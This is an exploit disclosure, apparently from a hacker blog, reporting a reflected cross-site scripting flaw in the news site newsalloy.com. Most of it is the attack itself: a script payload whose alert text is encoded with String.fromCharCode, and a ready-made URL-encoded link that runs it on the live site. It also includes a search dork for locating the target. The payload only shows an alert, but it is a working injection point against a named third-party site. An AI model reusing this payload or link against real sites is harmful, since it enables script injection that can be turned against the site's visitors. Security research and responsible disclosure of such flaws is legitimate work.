>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> WhiteHatZone <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< # Exploit Title: XSS vulnerability in NewsAlloy.com # Date: 10/01/2012 # Author: Girish Shrimali # Website: http://whitehatzone.blogspot.com # Tested On: Win7 # Email: gjshrimali@gmail.com # Google Dork : newsalloy ############################################################################################################## >>> Vulnerable : http://www.newsalloy.com/ >>> Script : <script>alert(String.fromCharCode(88, 83, 83, 32, 102, 111, 117, 110, 100, 32, 98, 121, 32, 71, 105, 114, 105, 115, 104, 32, 83, 104, 114, 105, 109, 97, 108, 105))</script> >>> Vulnerable link : http://www.newsalloy.com/topic/%3Cscript%3Ealert%28String.fromCharCode%2888%2C_83%2C_83%2C_32%2C_102%2C_111%2C_117%2C_110%2C_100%2C_32%2C_98%2C_121%2C_32%2C_71%2C_105%2C_114%2C_105%2C_115%2C_104%2C_32%2C_83%2C_104%2C_114%2C_105%2C_109%2C_97%2C_108%2C_105%29%29%3C%2Fscript%3E/ ############################################################################################################## Greetz : Vidit Baxi, Sumit Pareek